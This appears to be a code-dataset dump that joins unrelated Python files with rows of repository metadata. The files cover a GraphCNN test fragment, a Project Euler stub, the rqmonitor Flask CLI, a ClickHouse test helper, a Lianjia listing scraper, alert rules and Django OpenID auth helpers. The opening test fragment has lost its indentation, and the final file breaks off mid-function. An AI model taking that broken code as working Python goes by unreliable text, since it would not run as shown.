"""Test invoking GraphCNN in eager mode."""
with context.eager_mode():
V = np.random.uniform(size=(10, 100, 50)).astype(np.float32)
adjs = np.random.uniform(size=(10, 100, 5, 100)).astype(np.float32)
layer = layers.GraphCNN(num_filters=6)
result = layer(V, adjs)
assert result.shape == (10, 100, 6)
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.GraphCNN(num_filters=6)
result2 = layer2(V, adjs)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(V, adjs)
assert np.allclose(result, result3)
def test_hinge_loss(self):
"""Test invoking HingeLoss in eager mode."""
with context.eager_mode():
n_labels = 1
n_logits = 1
logits = np.random.rand(n_logits).astype(np.float32)
labels = np.random.rand(n_labels).astype(np.float32)
result = layers.HingeLoss()(labels, logits)
assert result.shape == (n_labels,)
| 37.264995 | 94 | 0.654747 | 4,572 | 34,172 | 4.768591 | 0.071085 | 0.052426 | 0.052289 | 0.043345 | 0.760618 | 0.712503 | 0.676131 | 0.639116 | 0.612054 | 0.571874 | 0 | 0.032992 | 0.231856 | 34,172 | 916 | 95 | 37.305677 | 0.797592 | 0.166803 | 0 | 0.538922 | 0 | 0 | 0.000427 | 0 | 0 | 0 | 0 | 0.001092 | 0.208084 | 1 | 0.094311 | false | 0 | 0.013473 | 0 | 0.109281 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c4f8a7e27a6b1a8b93095262140e88ebc073c0f4 | 790 | py | Python | py/py_0049_prime_permutations.py | lcsm29/project-euler | fab794ece5aa7a11fc7c2177f26250f40a5b1447 | [
"MIT"
] | null | null | null | py/py_0049_prime_permutations.py | lcsm29/project-euler | fab794ece5aa7a11fc7c2177f26250f40a5b1447 | [
"MIT"
] | null | null | null | py/py_0049_prime_permutations.py | lcsm29/project-euler | fab794ece5aa7a11fc7c2177f26250f40a5b1447 | [
"MIT"
] | null | null | null | # Solution of;
# Project Euler Problem 49: Prime permutations
# https://projecteuler.net/problem=49
#
# The arithmetic sequence, 1487, 4817, 8147, in which each of the terms
# increases by 3330, is unusual in two ways: (i) each of the three terms are
# prime, and, (ii) each of the 4-digit numbers are permutations of one
# another. There are no arithmetic sequences made up of three 1-, 2-, or
# 3-digit primes, exhibiting this property, but there is one other 4-digit
# increasing sequence. What 12-digit number do you form by concatenating the
# three terms in this sequence?
#
# by lcsm29 http://github.com/lcsm29/project-euler
import timed
def dummy(n):
pass
if __name__ == '__main__':
n = 1000
i = 10000
prob_id = 49
timed.caller(dummy, n, i, prob_id)
| 30.384615 | 77 | 0.711392 | 127 | 790 | 4.346457 | 0.622047 | 0.032609 | 0.048913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066456 | 0.2 | 790 | 25 | 78 | 31.6 | 0.806962 | 0.775949 | 0 | 0 | 0 | 0 | 0.04908 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.125 | 0.125 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c4f93be850b5b4fb3f0bf11c18b271c4dd267dcc | 8,879 | py | Python | rqmonitor/cli.py | trodery/rqmonitor | 65831337591afe6887dec2dbb37a28d84f881f35 | [
"Apache-2.0"
] | null | null | null | rqmonitor/cli.py | trodery/rqmonitor | 65831337591afe6887dec2dbb37a28d84f881f35 | [
"Apache-2.0"
] | null | null | null | rqmonitor/cli.py | trodery/rqmonitor | 65831337591afe6887dec2dbb37a28d84f881f35 | [
"Apache-2.0"
] | null | null | null | """
This reference script has been taken from rq-dashboard with some modifications
"""
import importlib
import logging
import os
import sys
from urllib.parse import quote as urlquote, urlunparse
from redis.connection import (URL_QUERY_ARGUMENT_PARSERS,
UnixDomainSocketConnection,
SSLConnection)
from urllib.parse import urlparse, parse_qs, unquote
import click
from flask import Flask, Response, request
from rqmonitor.defaults import RQ_MONITOR_REDIS_URL, RQ_MONITOR_REFRESH_INTERVAL
from rqmonitor.version import VERSION
from rqmonitor.bp import monitor_blueprint
logger = logging.getLogger("werkzeug")
def add_basic_auth(blueprint, username, password, realm="RQ Monitor"):
"""Add HTTP Basic Auth to a blueprint.
Note this is only for casual use!
"""
@blueprint.before_request
def basic_http_auth(*args, **kwargs):
auth = request.authorization
if auth is None or auth.password != password or auth.username != username:
return Response(
"Please login",
401,
{"WWW-Authenticate": 'Basic realm="{}"'.format(realm)},
)
def create_app_with_blueprint(config=None, username=None, password=None,
url_prefix='', blueprint=monitor_blueprint):
"""Return Flask app with default configuration and registered blueprint."""
app = Flask(__name__)
# Override with any settings in config file, if given.
if config:
app.config.from_object(importlib.import_module(config))
# Override from a configuration file in the env variable, if present.
if "RQ_MONITOR_SETTINGS" in os.environ:
app.config.from_envvar("RQ_MONITOR_SETTINGS")
# Optionally add basic auth to blueprint and register with app.
if username:
add_basic_auth(blueprint, username, password)
app.register_blueprint(blueprint, url_prefix=url_prefix)
return app
def check_url(url, decode_components=False):
"""
Taken from redis-py for basic check before passing URL to redis-py
Kept here to show error before launching app
For example::
redis://[[username]:[password]]@localhost:6379/0
rediss://[[username]:[password]]@localhost:6379/0
unix://[[username]:[password]]@/path/to/socket.sock?db=0
Three URL schemes are supported:
- ```redis://``
<https://www.iana.org/assignments/uri-schemes/prov/redis>`_ creates a
normal TCP socket connection
- ```rediss://``
<https://www.iana.org/assignments/uri-schemes/prov/rediss>`_ creates
a SSL wrapped TCP socket connection
- ``unix://`` creates a Unix Domain Socket connection
There are several ways to specify a database number. The parse function
will return the first specified option:
1. A ``db`` querystring option, e.g. redis://localhost?db=0
2. If using the redis:// scheme, the path argument of the url, e.g.
redis://localhost/0
3. The ``db`` argument to this function.
If none of these options are specified, db=0 is used.
The ``decode_components`` argument allows this function to work with
percent-encoded URLs. If this argument is set to ``True`` all ``%xx``
escapes will be replaced by their single-character equivalents after
the URL has been parsed. This only applies to the ``hostname``,
``path``, ``username`` and ``password`` components.
Any additional querystring arguments and keyword arguments will be
passed along to the ConnectionPool class's initializer. The querystring
arguments ``socket_connect_timeout`` and ``socket_timeout`` if supplied
are parsed as float values. The arguments ``socket_keepalive`` and
``retry_on_timeout`` are parsed to boolean values that accept
True/False, Yes/No values to indicate state. Invalid types cause a
``UserWarning`` to be raised. In the case of conflicting arguments,
querystring arguments always win.
"""
url = urlparse(url)
url_options = {}
for name, value in (parse_qs(url.query)).items():
if value and len(value) > 0:
parser = URL_QUERY_ARGUMENT_PARSERS.get(name)
if parser:
try:
url_options[name] = parser(value[0])
except (TypeError, ValueError):
logger.warning(UserWarning(
"Invalid value for `%s` in connection URL." % name
))
else:
url_options[name] = value[0]
if decode_components:
username = unquote(url.username) if url.username else None
password = unquote(url.password) if url.password else None
path = unquote(url.path) if url.path else None
hostname = unquote(url.hostname) if url.hostname else None
else:
username = url.username or None
password = url.password or None
path = url.path
hostname = url.hostname
# We only support redis://, rediss:// and unix:// schemes.
if url.scheme == 'unix':
url_options.update({
'username': username,
'password': password,
'path': path,
'connection_class': UnixDomainSocketConnection,
})
elif url.scheme in ('redis', 'rediss'):
url_options.update({
'host': hostname,
'port': int(url.port or 6379),
'username': username,
'password': password,
})
# If there's a path argument, use it as the db argument if a
# querystring value wasn't specified
if 'db' not in url_options and path:
try:
url_options['db'] = int(path.replace('/', ''))
except (AttributeError, ValueError):
pass
if url.scheme == 'rediss':
url_options['connection_class'] = SSLConnection
else:
valid_schemes = ', '.join(('redis://', 'rediss://', 'unix://'))
raise ValueError('Redis URL must specify one of the following '
'schemes (%s)' % valid_schemes)
return True
@click.command()
@click.option(
"-b",
"--bind",
default="0.0.0.0",
help="IP or hostname on which to bind HTTP server",
)
@click.option(
"-p", "--port", default=8899, type=int, help="Port on which to bind HTTP server"
)
@click.option(
"--url-prefix", default="", help="URL prefix e.g. for use behind a reverse proxy"
)
@click.option(
"--username", default=None, help="HTTP Basic Auth username (not used if not set)"
)
@click.option("--password", default=None, help="HTTP Basic Auth password")
@click.option(
"-c",
"--config",
default=None,
help="Configuration file (Python module on search path)",
)
@click.option(
"-u",
"--redis-url",
default=[RQ_MONITOR_REDIS_URL],
multiple=True,
help="Redis URL. Can be specified multiple times. Default: redis://127.0.0.1:6379",
)
@click.option(
"--refresh-interval",
"--interval",
"refresh_interval",
default=RQ_MONITOR_REFRESH_INTERVAL,
type=int,
help="Refresh interval in ms",
)
@click.option(
"--extra-path",
default=".",
multiple=True,
help="Append specified directories to sys.path",
)
@click.option("--debug/--normal", default=False, help="Enter DEBUG mode")
@click.option(
"-v", "--verbose", is_flag=True, default=False, help="Enable verbose logging"
)
def run(
bind,
port,
url_prefix,
username,
password,
config,
redis_url,
refresh_interval,
extra_path,
debug,
verbose,
):
"""Run the RQ Monitor Flask server.
All configuration can be set on the command line or through environment
variables of the form RQ_MONITOR_*. For example RQ_MONITOR_USERNAME.
A subset of the configuration (the configuration parameters used by the
underlying flask blueprint) can also be provided in a Python module
referenced using --config, or with a .cfg file referenced by the
RQ_MONITOR_SETTINGS environment variable.
"""
if extra_path:
sys.path += list(extra_path)
click.echo("RQ Monitor version {}".format(VERSION))
app = create_app_with_blueprint(config, username, password, url_prefix, monitor_blueprint)
app.config["RQ_MONITOR_REDIS_URL"] = redis_url
app.config["RQ_MONITOR_REFRESH_INTERVAL"] = refresh_interval
# Conditionally disable Flask console messages
# See: https://stackoverflow.com/questions/14888799
if verbose:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.ERROR)
logger.error(" * Running on {}:{}".format(bind, port))
for url in redis_url:
check_url(url)
app.run(host=bind, port=port, debug=debug)
def main():
run(auto_envvar_prefix="RQ_MONITOR")
if __name__ == '__main__':
main() | 32.52381 | 94 | 0.64692 | 1,108 | 8,879 | 5.083935 | 0.278881 | 0.023966 | 0.007456 | 0.009054 | 0.069945 | 0.049352 | 0.026274 | 0.026274 | 0 | 0 | 0 | 0.007909 | 0.245298 | 8,879 | 273 | 95 | 32.52381 | 0.832712 | 0.328077 | 0 | 0.150602 | 0 | 0.006024 | 0.175335 | 0.008523 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036145 | false | 0.072289 | 0.078313 | 0 | 0.13253 | 0.048193 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c4fbf075eb619be044717172093dd9b2c09291e8 | 1,579 | py | Python | dbms/tests/integration/helpers/test_tools.py | qqiangwu/ClickHouse | 4700d375d8238ca3d7f39a1d0001f173272bbf3a | [
"Apache-2.0"
] | 4 | 2020-04-27T13:03:31.000Z | 2020-10-15T09:51:13.000Z | dbms/tests/integration/helpers/test_tools.py | RCcode/ClickHouse | ccfb51b8dd680a8ad2863e0b2f4e32364b86daf2 | [
"Apache-2.0"
] | 8 | 2018-11-21T09:45:25.000Z | 2018-11-21T13:53:40.000Z | dbms/tests/integration/helpers/test_tools.py | RCcode/ClickHouse | ccfb51b8dd680a8ad2863e0b2f4e32364b86daf2 | [
"Apache-2.0"
] | 2 | 2018-12-17T13:08:09.000Z | 2022-01-26T08:50:20.000Z | import difflib
import time
class TSV:
"""Helper to get pretty diffs between expected and actual tab-separated value files"""
def __init__(self, contents):
raw_lines = contents.readlines() if isinstance(contents, file) else contents.splitlines(True)
self.lines = [l.strip() for l in raw_lines if l.strip()]
def __eq__(self, other):
return self.lines == other.lines
def __ne__(self, other):
return self.lines != other.lines
def diff(self, other, n1=None, n2=None):
return list(line.rstrip() for line in difflib.unified_diff(self.lines, other.lines, fromfile=n1, tofile=n2))[2:]
def __str__(self):
return '\n'.join(self.lines)
@staticmethod
def toMat(contents):
return [line.split("\t") for line in contents.split("\n") if line.strip()]
def assert_eq_with_retry(instance, query, expectation, retry_count=20, sleep_time=0.5, stdin=None, timeout=None, settings=None, user=None, ignore_error=False):
expectation_tsv = TSV(expectation)
for i in xrange(retry_count):
try:
if TSV(instance.query(query)) == expectation_tsv:
break
time.sleep(sleep_time)
except Exception as ex:
print "assert_eq_with_retry retry {} exception {}".format(i + 1, ex)
time.sleep(sleep_time)
else:
val = TSV(instance.query(query))
if expectation_tsv != val:
raise AssertionError("'{}' != '{}'\n{}".format(expectation_tsv, val, '\n'.join(expectation_tsv.diff(val, n1="expectation", n2="query"))))
| 38.512195 | 159 | 0.645978 | 212 | 1,579 | 4.641509 | 0.419811 | 0.045732 | 0.042683 | 0.057927 | 0.075203 | 0.075203 | 0.075203 | 0.075203 | 0 | 0 | 0 | 0.00978 | 0.222926 | 1,579 | 40 | 160 | 39.475 | 0.792176 | 0 | 0 | 0.064516 | 0 | 0 | 0.054923 | 0 | 0 | 0 | 0 | 0 | 0.096774 | 0 | null | null | 0 | 0.064516 | null | null | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
f204e6f22d0c9b479799a0897aaa41e742212566 | 5,767 | py | Python | Lianjia/LianjiaErShouFang.py | Detailscool/YHSpider | ab1276c9167f70fed3ccff17e02fb62d51e4a469 | [
"MIT"
] | 1 | 2017-05-04T08:10:34.000Z | 2017-05-04T08:10:34.000Z | Lianjia/LianjiaErShouFang.py | Detailscool/YHSpider | ab1276c9167f70fed3ccff17e02fb62d51e4a469 | [
"MIT"
] | null | null | null | Lianjia/LianjiaErShouFang.py | Detailscool/YHSpider | ab1276c9167f70fed3ccff17e02fb62d51e4a469 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
import requests
from bs4 import BeautifulSoup
import sys
import csv
reload(sys)
sys.setdefaultencoding('utf-8')
def not_empty(str):
return str and str.strip()
if __name__ == '__main__':
url_main = 'http://gz.lianjia.com'
f = open(u'广州二手房.csv', 'wb')
f.write(unicode('\xEF\xBB\xBF', 'utf-8')) # 文件头
writer = csv.writer(f)
writer.writerow(['区域', '小区名称', '户型', '面积', '价格(万)', '单价(元/平米)',
'性质', '朝向', '装修', '是否有电梯', '楼层', '建筑年代', '楼型'])
res = requests.get(url_main+'ershoufang')
res = res.text.encode(res.encoding).decode('utf-8')
soup = BeautifulSoup(res, 'html.parser')
# print soup.prettify()
districts = soup.find(name='div', attrs={'data-role':'ershoufang'}) # <div data-role="ershoufang">
# soup.select()
for district in districts.find_all(name='a'):
print district['title']
district_name = district.text # '东城', '西城', '朝阳', '海淀'......
url = '%s%s' % (url_main, district['href'])
# print url
res = requests.get(url)
res = res.text.encode(res.encoding).decode('utf-8')
soup = BeautifulSoup(res,'html.parser')
# print soup.prettify()
page = soup.find('div', {'class':'page-box house-lst-page-box'})
if not page: # 平谷区没有房源,直接返回
continue
total_pages = dict(eval(page['page-data']))['totalPage'] # 总页数
# print total_pages
for j in range(1, total_pages+1):
url_page = '%spg%d/' % (url, j)
res = requests.get(url_page)
res = res.text.encode(res.encoding).decode('utf-8')
soup = BeautifulSoup(res, 'html.parser')
# print soup.prettify()
sells = soup.find(name='ul', attrs={'class':'sellListContent', 'log-mod':'list'})
if not sells:
continue
# <a class="title" data-bl="list" data-el="ershoufang" data-log_index="1" href="XX" target="_blank">
titles = soup.find_all(name='a', attrs={'class':'title', 'data-bl':'list', 'data-el':'ershoufang'})
# <a data-el="region" data-log_index="1" href="X" target="_blank">
regions = sells.find_all(name='a', attrs={'data-el':'region'})
infos = sells.find_all(name='div', class_='houseInfo') # <div class="houseInfo">
infos2 = sells.find_all(name='div', class_='positionInfo') # <div class="positionInfo">
prices = sells.find_all(name='div', class_='totalPrice') # <div class="totalPrice">
unit_prices = sells.find_all(name='div', class_='unitPrice') # <div class="unitPrice" data-hid="X" data-price="X" data-rid="X">
subways = sells.find_all(name='span', class_='subway') # <span class="subway">
taxs = sells.find_all(name='span', class_='taxfree') # <span class="taxfree">
N = max(len(titles), len(regions), len(prices), len(unit_prices), len(subways), len(taxs), len(infos), len(infos2))
# for title, region, price, unit_price, subway, tax, info, info2 in zip(titles, regions, prices, unit_prices, subways, taxs, infos, infos2):
for i in range(N):
room_type = area = orientation = decoration = elevator = floor = year = slab_tower = None
title = titles[i] if len(titles) > i else None
region = regions[i] if len(regions) > i else None
price = prices[i] if len(prices) > i else None
unit_price = unit_prices[i] if len(unit_prices) > i else None
subway = subways[i] if len(subways) > i else None
tax = taxs[i] if len(taxs) > i else None
info = infos[i] if len(infos) > i else None
info2 = infos2[i] if len(infos2) > i else None
if title:
print 'Title: ', title.text
if region:
region = region.text
if price:
price = price.text
price = price[:price.find('万')]
if unit_price:
unit_price = unit_price.span.text.strip()
unit_price = unit_price[:unit_price.find('元/平米')]
if unit_price.find('单价') != -1:
unit_price = unit_price[2:]
if subway:
subway = subway.text.strip()
if tax:
tax = tax.text.strip()
if info:
info = info.text.split('|')
room_type = info[1].strip() # 几室几厅
area = info[2].strip() # 房屋面积
area = area[:area.find('平米')]
orientation = info[3].strip().replace(' ', '') # 朝向
decoration = '-'
if len(info) > 4: # 如果是车位,则该项为空
decoration = info[4].strip() # 装修类型:简装、中装、精装、豪装、其他
elevator = '无'
if len(info) > 5:
elevator = info[5].strip() # 是否有电梯:有、无
if info2:
info2 = filter(not_empty, info2.text.split(' '))
floor = info2[0].strip()
info2 = info2[1]
year = info2[:info2.find('年')]
slab_tower = info2[info2.find('建')+1:]
print district_name, region, room_type, area, price, unit_price, tax, orientation, decoration, elevator, floor, year, slab_tower
writer.writerow([district_name, region, room_type, area, price, unit_price, tax, orientation, decoration, elevator, floor, year, slab_tower])
# break
# break
# break
f.close()
| 50.147826 | 157 | 0.521935 | 693 | 5,767 | 4.248196 | 0.262626 | 0.039742 | 0.033628 | 0.038043 | 0.284986 | 0.261889 | 0.210258 | 0.173913 | 0.149457 | 0.149457 | 0 | 0.010304 | 0.32686 | 5,767 | 114 | 158 | 50.587719 | 0.748068 | 0.133345 | 0 | 0.085106 | 0 | 0 | 0.088585 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.042553 | null | null | 0.031915 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
f209fda8f0cfe43f72b6eb3a30447ef4d992f64f | 6,764 | py | Python | python/alertsActor/rules/dangerKey.py | sdss/twistedAlertsActor | 857588f6da39b7716263f8bd8e3f1be8bb4ce0f7 | [
"BSD-3-Clause"
] | null | null | null | python/alertsActor/rules/dangerKey.py | sdss/twistedAlertsActor | 857588f6da39b7716263f8bd8e3f1be8bb4ce0f7 | [
"BSD-3-Clause"
] | null | null | null | python/alertsActor/rules/dangerKey.py | sdss/twistedAlertsActor | 857588f6da39b7716263f8bd8e3f1be8bb4ce0f7 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
#
# dangerKey.py
#
# Created by John Donor on 10 April 2019
import re, time
from yaml import YAMLObject
from alertsActor import log
class diskCheck(YAMLObject):
"""evaluate a disk keyword
"""
def __init__(self):
pass
def __call__(self, keyState):
"""The keyval is an enum ('Ok','Warning','Serious','Critical')
and the amount of free space (GB)
"""
keyval = keyState.keyword
if (keyval[0]).upper() == 'OK':
return "ok"
elif (keyval[0]).upper() == 'WARNING':
return "warn"
elif (keyval[0]).upper() == 'SERIOUS':
return "serious"
elif (keyval[0]).upper() == 'CRITICAL':
return "critical"
else:
return "info"
class doNothing(object):
"""camcheck alerts can't check themselves
dummy class to facilitate that
"""
def __init__(self):
pass
def __call__(self, keyState):
return keyState.severity
class camCheck(YAMLObject):
"""evaluate a camCheck alert
"""
def __init__(self):
# NEVER GETS CALLED!!!! -_-
pass
def generateCamCheckAlert(self, key, severity):
inst = key[:3]
side = key[3]
key = "camCheck." + key
instruments = ["boss"]
# most keywords will be SP[12][RB]
# check if they are and assign appropriate instruments
if inst in ["SP1", "SP2"]:
instruments.append("boss.{}".format(inst))
if side in ["R", "B"]:
instruments.append("boss.{}.{}".format(inst, side))
if severity in ["critical", "serious"]:
selfClear = False
addresses = self.emailAddresses
else:
selfClear = True
addresses = None
if key not in self.triggered:
self.triggered.append(key)
if key not in self.alertsActor.monitoring:
dumbCheck = doNothing()
self.alertsActor.addKey(key, severity=severity, checkAfter=120,
selfClear=selfClear, checker=dumbCheck,
keyword="'Reported by camCheck'",
instruments=instruments, emailAddresses=addresses,
emailDelay=0)
if self.alertsActor.monitoring[key].active:
self.alertsActor.monitoring[key].stampTime()
else:
self.alertsActor.monitoring[key].setActive(severity)
def __call__(self, keyState):
keyval = keyState.keyword
if self.alertsActor is None:
print("setting alertsActor for camCheck!!")
self.alertsActor = keyState.alertsActorReference
# do this only once hopefully
for i in ["boss.SP1", "boss.SP2", "boss.SP1.R", "boss.SP2.R",
"boss.SP1.B", "boss.SP2.B"]:
self.alertsActor.instrumentDown[i] = False
# print("CAMCHECK, len {}, type {}, key: {}".format(len(keyval), type(keyval), keyval))
log.info('CAMCHECK reported {}'.format(keyval))
if type(keyval) == str:
# could possibly try to fix this in hubModel casts, but easier here
keyval = [keyval]
if len(keyval) == 1 and keyval[0] == "None": # this is a bug somewhere upstream
keyval = []
for k in keyval:
if re.search(r"SP[12][RB][0-3]?CCDTemp", k):
self.generateCamCheckAlert(k, "critical")
elif re.search(r"SP[12]SecondaryDewarPress", k):
self.generateCamCheckAlert(k, "critical")
elif re.search(r"SP[12](DAQ|Mech|Micro)NotTalking", k):
self.generateCamCheckAlert(k, "critical")
elif re.search(r"DACS_SET", k):
self.generateCamCheckAlert(k, "critical")
elif re.search(r"SP[12]LN2Fill", k):
self.generateCamCheckAlert(k, "serious")
elif re.search(r"SP[12](Exec|Phase)Boot", k):
self.generateCamCheckAlert(k, "serious")
else:
self.generateCamCheckAlert(k, "warn")
for k in self.triggered:
if k.split(".")[-1] not in keyval: # b/c we know its camCheck already
self.alertsActor.monitoring[k].severity = "ok"
# now it can check itself and find out its cool
# and then decide to disappear if its acknowledged, etc etc
self.alertsActor.monitoring[k].checkKey()
self.triggered.remove(k)
# never flag camCheck, always monitored keys
return "ok"
class heartbeatCheck(YAMLObject):
"""check a heartbeat.
"""
def __init__(self):
pass
def __call__(self, keyState):
if time.time() - keyState.lastalive < keyState.checkAfter:
return "ok"
elif time.time() - keyState.lastalive > 5*keyState.checkAfter:
return "critical"
else:
return keyState.defaultSeverity
class above(YAMLObject):
"""literally: is the value too high
"""
def __init__(self):
pass
def __call__(self, keyState):
if keyState.keyword > keyState.dangerVal:
return keyState.defaultSeverity
else:
return "ok"
class below(YAMLObject):
"""literally: is the value too low
"""
def __init__(self):
pass
def __call__(self, keyState):
if keyState.keyword < keyState.dangerVal:
return keyState.defaultSeverity
else:
return "ok"
class neq(YAMLObject):
"""literally: is the value too low
"""
def __init__(self):
pass
def __call__(self, keyState):
if keyState.keyword != keyState.dangerVal:
return keyState.defaultSeverity
else:
return "ok"
class inList(YAMLObject):
"""is any value in the list "True", e.g. flagged
"""
def __init__(self):
pass
def __call__(self, keyState):
if [k for k in keyState.keyword if k]:
return keyState.defaultSeverity
else:
return "ok"
class firstElem(YAMLObject):
"""is any value in the list "True", e.g. flagged
"""
def __init__(self):
pass
def __call__(self, keyState):
if keyState.keyword[0] == keyState.dangerVal:
return keyState.defaultSeverity
else:
return "ok"
class default(object):
"""check equality to a dangerval
"""
def __init__(self):
pass
def __call__(self, keyState):
if keyState.keyword == keyState.dangerVal:
return keyState.defaultSeverity
else:
return "ok"
| 29.797357 | 95 | 0.563128 | 725 | 6,764 | 5.14069 | 0.286897 | 0.018782 | 0.029514 | 0.050979 | 0.356587 | 0.310706 | 0.297558 | 0.285216 | 0.266971 | 0.227529 | 0 | 0.009864 | 0.325547 | 6,764 | 226 | 96 | 29.929204 | 0.807102 | 0.161295 | 0 | 0.458904 | 0 | 0 | 0.078607 | 0.018306 | 0 | 0 | 0 | 0 | 0 | 1 | 0.143836 | false | 0.068493 | 0.020548 | 0.006849 | 0.383562 | 0.006849 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
f20a9c6a0a0f41308a9f256ea4ec3d2997af5cd5 | 6,388 | py | Python | eruditio/shared_apps/django_community/utils.py | genghisu/eruditio | 5f8f3b682ac28fd3f464e7a993c3988c1a49eb02 | [
"BSD-3-Clause",
"MIT"
] | null | null | null | eruditio/shared_apps/django_community/utils.py | genghisu/eruditio | 5f8f3b682ac28fd3f464e7a993c3988c1a49eb02 | [
"BSD-3-Clause",
"MIT"
] | null | null | null | eruditio/shared_apps/django_community/utils.py | genghisu/eruditio | 5f8f3b682ac28fd3f464e7a993c3988c1a49eb02 | [
"BSD-3-Clause",
"MIT"
] | null | null | null | """
Various utilities functions used by django_community and
other apps to perform authentication related tasks.
"""
import hashlib, re
import django.forms as forms
from django.core.exceptions import ObjectDoesNotExist
from django.forms import ValidationError
import django.http as http
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from django.contrib.auth import logout as auth_logout
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login
from django_community.models import UserOpenID, UserProfile
def openid_logout(request):
"""
Clears session which effectively logs out the current
OpenId user.
"""
request.session.flush()
def handle_logout(request):
"""
Log out.
"""
auth_logout(request)
def get_logged_user(request):
"""
Returns the current user who is logged in, checks for openid user first,
then for regular user, return None if no user is currently logged in
"""
if settings.OPENID_ENABLED and hasattr(request, 'openid'):
user = UserOpenID.objects.get_for_openid(request, request.openid)
if not user:
user = request.user
return user
def handle_login(request, data):
"""
Logs the user in based on form data from django_community.LoginForm.
"""
user = authenticate(username = data.get('username', None),
password = data.get('password', None))
user_object = User.objects.get(username = data.get('username', None))
if user is not None:
login(request, user)
return user
def handle_signup(request, data):
"""
Signs a user up based on form data from django_community.SignupForm.
"""
from django.contrib.auth.models import get_hexdigest
username = data.get('username', None)
email = data.get('email', None)
password = data.get('password', None)
try:
user = User.objects.get(username = username, email = email)
except ObjectDoesNotExist:
user = User(username = username, email = email)
user.save()
user.set_password(password)
user_profile = UserProfile.objects.get_user_profile(user)
user = authenticate(username = username, password = password)
login(request, user)
return user
def get_or_create_from_openid(openid):
"""
Returns an User with the given openid or
creates a new user and associates openid with that user.
"""
try:
user = User.objects.get(username = openid)
except ObjectDoesNotExist:
password = hashlib.sha256(openid).hexdigest()
user = User(username = openid, email = '', password = password)
user.save()
user.display_name = "%s_%s" % ('user', str(user.id))
user.save()
return user
def generate_random_user_name():
"""
Generates a random user name user_{user_id}_{salt}
to be used for creating new users.
"""
import random
current_users = User.objects.all().order_by('-id')
if current_users:
next_id = current_users[0].id + 1
else:
next_id = 1
random_salt = random.randint(1, 5000)
return 'user_%s_%s' % (str(next_id), str(random_salt))
def create_user_from_openid(request, openid):
"""
Creates a new User object associated with the given
openid.
"""
from django_community.config import OPENID_FIELD_MAPPING
from django_utils.request_helpers import get_ip
username = generate_random_user_name()
profile_attributes = {}
for attribute in OPENID_FIELD_MAPPING.keys():
mapped_attribute = OPENID_FIELD_MAPPING[attribute]
if openid.sreg and openid.sreg.get(attribute, ''):
profile_attributes[mapped_attribute] = openid.sreg.get(attribute, '')
new_user = User(username = username)
new_user.save()
new_openid = UserOpenID(openid = openid.openid, user = new_user)
new_openid.save()
new_user_profile = UserProfile.objects.get_user_profile(new_user)
for filled_attribute in profile_attributes.keys():
setattr(new_user, filled_attribute, profile_attributes[filled_attribute])
new_user_profile.save()
return new_user
def get_anon_user(request):
"""
Returns an anonmymous user corresponding to this IP address if one exists.
Else create an anonymous user and return it.
"""
try:
anon_user = User.objects.get(username = generate_anon_user_name(request))
except ObjectDoesNotExist:
anon_user = create_anon_user(request)
return anon_user
def create_anon_user(request):
"""
Creates a new anonymous user based on the ip provided by the request
object.
"""
anon_user_name = generate_anon_user_name(request)
anon_user = User(username = anon_user_name)
anon_user.save()
user_profile = UserProfile(user = anon_user, display_name = 'anonymous')
user_profile.save()
return anon_user
def generate_anon_user_name(request):
"""
Generate an anonymous user name based on and ip address.
"""
from django_utils.request_helpers import get_ip
ip = get_ip(request)
return "anon_user_%s" % (str(ip))
def is_anon_user(user):
"""
Determine if an user is anonymous or not.
"""
return user.username[0:10] == 'anon_user_'
def is_random(name):
"""
Determine if a user has a randomly generated display name.
"""
if len(name.split('_')) and name.startswith('user'):
return True
else:
return False
def process_ax_data(user, ax_data):
"""
Process OpenID AX data.
"""
import django_openidconsumer.config
